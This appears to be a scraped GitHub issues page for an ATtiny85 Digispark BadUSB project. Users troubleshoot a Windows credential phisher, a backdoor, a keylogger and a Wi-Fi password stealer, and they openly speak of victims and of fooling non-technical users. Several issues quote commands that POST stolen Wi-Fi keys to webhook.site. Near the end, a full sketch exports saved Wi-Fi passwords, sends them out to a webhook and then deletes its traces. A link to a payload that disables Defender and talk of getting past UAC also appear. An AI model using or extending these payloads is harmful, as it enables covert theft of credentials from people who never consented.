mtk911 / attiny85 Goto Github PK

Can i used the payloads for pico w?

In line 13 of Windows_Phisher.ino, why is there "" after [ASDI]? Even if we "" those, the same keystrokes are given, so why is "" there?

Hey, idk of this project is dead or not but is it posibble to add this payload that is on the rubberducky github
(https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/library/general/Disable-Windows-Defender-Permanently/payload.txt)

Describe the bug

A clear and concise description of what the bug is.

Check List

Before opening an Issue make sure following things are checked:

• Using English Keyboard
• User have required privileges [e.g. is Admin, etc]
• webhook.site or anyother hook link is added in payload and link is working
  
  
  

Screenshots

If applicable, add screenshots to help explain your problem.

Please complete the following information:

• OS: [e.g. Win10, Win 7]
• User Role/Group/Privilege [e.g. Administrator, User]
• Keyboard layout & Language [e.g. QWERTY & English_US]
• Change DigiKeyboard.print("powershell.... or DigiKeyboard.print("cmd.... to DigiKeyboard.print("notepad"); and paste the notepad output here

I just want to say: Thank you for your work. The Phisher is absolutetly amazing and it does exactly what you expect it to do.

Now my Problem is that the window looks rather outdated. I mean people who arent so techsavy will believe it, but others not so much. So i wanted to ask if its possible to make a Window like this:

A place where i saw it used is here for example:
https://github.com/Dviros/CredsLeaker
But this version obviously doesnt work on a digispark.

If its not possible, thats ok! Thanks in advance.

Hi,

when executing the commads which where entered by the Attiny are not quiet similar to the downloaded payload.
for e.g the line:
DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS")
is executed with:
powershell SelectßString ßPath Wi(.xml ßPattern äkezMaterialä : WißFißPASS
Maybe QWERTZ and QWERTY is a thing here?

I developed and integrated your scripts into my project
Thank you for the code and the idea

https://github.com/borma425/Digispark_Overmaster

Not sending anything to my webhook

if im using backdoor how do i make it so i can control victim pc from my pc

So when I run the wifi password stealer all goes fine and creates several files with the password but when: powershell Invoke-WebRequest -Uri https://webhook.site/<> -Method POST -InFile Wi-Fi-PASS runs it says that there aren´t any files. ¿any ideas why this is happening?

its send a empty file

Describe the bug

Screenshots

If applicable, add screenshots to help explain your problem.

Please complete the following information:

• OS: [Working: arch linux, windows 10 and 8.1]
• User Role/Group/Privilege [User]
• Keyboard layout & Language [QWERTY & English_US]

So I have been trying the Windows Phisher and it works perfecly except in the line

DigiKeyboard.println("powershell -noexit -command "mode con cols=18 lines=1"");

When I use the small poweshell when it goes to the main line (the one that does all the code) it just stops at the middle of the line and stops typing. But when I just do "powesell" it works just fine.

Instant shell does not work!!

The script runs just fine in windows 10 but when I go to kali I did not get a connection either using nc or msfconsle
The VMs on the same network and can ping each other!!

I get this error when digispark is trying to send the wifi info to https://webhook.site/.
Is there any way to fix this ?

Invoke-WebRequest : The remote server returned an error: (422) Unprocessable Entity.
At line:1 char:1

• Invoke-WebRequest -Uri https://webhook.site/...

•   + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
  

Hello, in the cmd it gets typed "keyiclear" instead of "key=clear" and there ore some other miss spelled words, how to fix that?

Describe the bug

As I have stated in the comment, I think that line shall be changed in order to be useful with the new Windows 11 version and it's redesigned task manager. You can see said comment here.

Check List

Before opening an Issue make sure following things are checked:

• Using English Keyboard
• User have required privileges [e.g. is Admin, etc]
• webhook.site or anyother hook link is added in payload and link is working
  
  
  

Screenshots

Please complete the following information:

• OS: W11
• User Role/Group/Privilege User to Admin
• Keyboard layout & Language QWERTY, Spanish (Int'l)
• Change DigiKeyboard.print("powershell.... or DigiKeyboard.print("cmd.... to DigiKeyboard.print("notepad"); and paste the notepad output here

I don't see how you bypassed UAC by just sending key to click yes to pop up when UAC dialog disables all such activity. Even system clock is not updated during popup and theme is changed so many functions are not allowed.
Please elaborate, thanks.

Hi,
first off i wanna say the Windows Phisher is absolutetly amazing man, it works like a charm on Pcs. But the Problem is the Domains. For Example: if to login you gotta type z.soliman as username and 1Zi1Zi1Z as pw, and then you let the phisher run on the pc it doesnt accept it as the real credentials. I think the problem is that if you login, Windows welcomes you with your real name (for example if your username was z.soliman, windows greets you with SOLIMAN Ziad) and i suppose this is the username that actually counts in the credentials, but no victim would think to type that in.
So in short what i am asking is: Could you fix this OR make it accept NON VALID Credentials too OR Make it send Failed attempts to webhook too instead of only the right ones.
I am not experienced at all, thats why i need your help. Thanks in advance!

Hello,

i am german and therefore have a German button layout. How can I change this so that it works with my button layout?
I used the WifiKey-Grab_Minimize-of-Shame.ino code.
There the output in the cmd console is
"netsh wlan export profile kez ́clear"
instead of
"netsh wlan export profile key=clear"
or
"powershell SelectßString ßPath Wi(.xml ßPattern äkezMaterialä : WißFißPASS"
instead of
"powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"
and all the others as well.

Screenshots

Please complete the following information:

• OS: [Win10]
• User Role/Group/Privilege [Administrator]
• Keyboard layout & Language [QWERTZ & German(https://en.wikipedia.org/wiki/German_keyboard_layout)]
• in the run window "notepad -k mode conÖ cols´15 lines´1"
  etsh wlan export profile kez´clear
powershell SelectßString ßPath Wi(.xml ßPattern äkezMaterialä : WißFißPASS
powershell InvokeßWebRequest ßUri httpsÖ--webhook.site-87c40ce9ßd60aß450aßb580ß4305684efd5a ßMethod POST ßInFile WißFißPASS
del Wiß( -s -f -q
exit

Thanks in advance :D

Sincerely, UsOrbis

Maybe stupid question here but..

I recently used your Attiny85 Backdoor Script and was able to successfully upload and run the script but I don't know how I would access the rdp from another computer? I Mean wouldnt there need to be an IP in the script or something? Im a noob.

Thanks

basically just what the title says, I've made sure to check to see if the link is working with the wifi password grabber, and that works just fine, however, the keylogger code never ends up sending anything

hi, the Windows Phisher file does not work anymore.
after the LED lights up and after the minute has passed, nothing happens. I had tried it in the past and it worked but now it doesn't work. why?

tested on windows 10

this is the error.

PS: if you want in the italian keyboard to move the cmd the key is KEY_S not KEY_M

Hello.
It looks like all the code works fine, untill i cant get over the login window. It still pops up even if the good credentials are inputed.

if i am using a usb with autorun could that work too if so what do i replace the DigiKeyboard with

i have windows 10 but when i plug the digispark with the code on it, seems like it try to open powershell by Windows+R
then powershell gets opened but nothing happens

also, im new at this so, idk what else can i do :/

Hello I have an error with creating the file with a content could you clarify that it works on the new windows 10 version. I seem to be able to create the file but there is no content is in the file and it wont upload to the Webhook website unless i change it to a .txt file

/*
Following payload will grab saved Wifi password and will send them to your hosted webhook.
*/

#include "DigiKeyboard.h"

void setup() {
pinMode(1, OUTPUT); //LED on Model A
}

void loop() {

DigiKeyboard.update();
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run
DigiKeyboard.delay(100);
DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible for trying to making it as less noticeable as possible
DigiKeyboard.delay(500);
DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir
DigiKeyboard.delay(300);
DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
DigiKeyboard.delay(500);
DigiKeyboard.println("powershell Select-String -Path Wi-Fi-PASS.txt -Pattern 'keyMaterial' > Wi-Fi-PASS.txt"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
DigiKeyboard.delay(500);
DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/ -Method POST -InFile Wi-Fi-PASS.txt"); //Submitting all passwords on hook
DigiKeyboard.delay(1000);
DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess
DigiKeyboard.delay(500);
DigiKeyboard.println("exit");
DigiKeyboard.delay(100);
digitalWrite(1, HIGH); //turn on led when program finishes
DigiKeyboard.delay(90000);
digitalWrite(1, LOW);
DigiKeyboard.delay(5000);

}

The script runs fine but for some computers, it sends passwords in plaintext

But for some computers, it sends this. Can it be decrypted? and why is it happening

hi, I loaded the code on the digispark without any problem. and it seems to run without any problems. opens the powershell and starts writing.
at the end the red led lights up. but no window is opened. any ideas? thanks